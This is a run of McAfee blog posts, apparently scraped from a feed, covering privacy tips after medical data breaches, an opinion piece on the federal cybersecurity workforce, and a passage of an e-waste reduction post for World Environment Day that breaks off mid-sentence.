While medical care providers should do all that they can to ensure the security of their patients, there are steps users can take to help maintain their privacy. If you think your personal or financial information might be affected by the recent breaches, check out the following tips to help keep your personal data secure:

  • Place a fraud alert.If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit.Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection.A solution like McAfee Identify Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Be vigilant about checking your accounts.If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blogs.

A Robust Federal Cybersecurity Workforce Is Key To Our National Security

The Federal government has long struggled to close the cybersecurity workforce gap. The problem has continued to get worse as the number of threats against our networks, critical infrastructure, intellectual property, and the millions of IoT devices we use in our homes, offices and on our infrastructure increase. Without a robust cyber workforce, federal agencies will continue to struggle to develop and execute the policies needed to combat these ongoing issues.

The recent executive order on developing the nation’s cybersecurity workforce was a key step to closing that gap and shoring up the nation’s cyber posture. The widespread adoption of the cybersecurity workforce framework by NIST, the development of a rotational program for Federal employees to expand their cybersecurity expertise and the “president’s cup” competition are all crucial to retaining and growing the federal cyber workforce. If we are to get serious about closing the federal workforce gap, we have to encourage our current professionals to stay in the federal service and grow their expertise to defend against the threats of today and prepare for the threats of tomorrow.

Further, we must do more to bring individuals into the field by eliminating barriers of entry and increasing the educational opportunities available for people so that there can be a strong, diverse and growing cybersecurity workforce in both the federal government and the private sector. Expanding scholarship programs through the National Science Foundation (NSF) and Department of Homeland Security (DHS) for students who agree to work for federal and state agencies will go a long way to bringing new, diverse individuals into the industry.  Additionally, these programs should be expanded to include many types of educational institutions including community colleges. Community colleges attract a different type of student than a 4-year institution, increasing diversity within the federal workforce while also tapping into a currently unused pipeline for cyber talent.

The administration’s prioritization of this issue is a positive step forward, and there has been progress made on closing the cyber skills gap in the U.S., but there is still work to be done. If we want to create a robust, diverse cyber workforce, the private sector, lawmakers and the administration must work together to come up with innovative solutions that build upon the recent executive order.

The post A Robust Federal Cybersecurity Workforce Is Key To Our National Security appeared first on McAfee Blogs.

What You Can Do to Reduce Your E-Waste This World Environment Day

Our love of technology and often biological need for new devices has created one of the biggest environmental issues of our time – e-waste. Today is World Environment Day – a great opportunity to ensure we are doing all we can to minimise landfill and protect our precious environment.

Over the last 12 months, BYO shopping bags, paper straws and ‘truly recyclable’ takeaway coffee cups have dominated our national environmental dialogue as essential ways to minimise future landfill. But with the average Aussie family generating a whopping 73 kg per year of e-waste, it’s critical that we turn our attention to our growing e-waste crisis this World Environment Day.

What is e-Waste?

E-Waste refers to old technology that you are no longer using. It includes microwaves, computers, TVs, batteries, screens, chargers, printer cartridges and even kitchen appliances.

High amounts of non-renewable resources such as plastic and precious metals (gold, silver, platinum, nickel, zinc, copper and aluminium) are found in e-waste. So, recycling these materials to make new electronics not only makes good financial sense but it also prevents products from winding up in a landfill.

According to experts, the average Aussie household own a startling 17 devices with predictions that this will increase to 27 by 2022.  So, it’s clear that our e-waste problem needs to be tackled head-on.

How Much e-Waste Is Generated Annually?

In January, the United Nations and World Economic Forum reported that the world produces 50 million tonnes of e-waste a year – around the same mass as 125,000 jumbo jets which is more than all the commercial aircraft ever built!

But interestingly, e-waste isn’t all bad news. In 2017, the UN University estimated the value of raw materials in e-waste to be worth  $US62.5 billion annually which exceeds the GDP (gross domestic product) of 123 countries. So, the opportunities contained in effective e-waste management are not only environmental but financial as economies could be bolstered and jobs could be created.

What Can We Do to Minimise It?

There are definitely steps we can all take to reduce our e-waste. While the obvious (less popular) strategy is to STOP purchasing new electronics, focussing in recycling and repurposing will go a long way to reducing our e-waste footprint. Here are my top tips:

  1. Repair or Refresh Your Current Devices

While we all love the idea of a shiny, new device, it’s often possible to repair or rejuvenate devices to avoid spending big bucks on a new one. Most devices can usually be repaired and even enhanced with a little expert ‘know-how’. I have spent a large chunk of my parenting career repairing and rescuing smartphones that were dropped, ‘washed’ or just deemed not ‘cool enough’. But the good news, it doesn’t take much to fix these issues: screens can be replaced, faults can be rectified, and new covers can be purchased to re-energise ‘the look’. And don’t forget the power of a software upgrade to ensure your phone is operating at its peak performance. If you are an Apple user, why not book a visit to their Genius Bar and let their staff show you how to get your device working at its optimum level?

  1. Sell or Give Away Your Unwanted Electronics

One of the easiest ways to manage your unwanted electronic devices is to rehome them. Gumtree and eBay are great online marketplaces to make a bit of extra cash by selling your obsolete devices. I know my boys have taken great delight in making a few extra bucks selling old phones and iPads over the years. Many char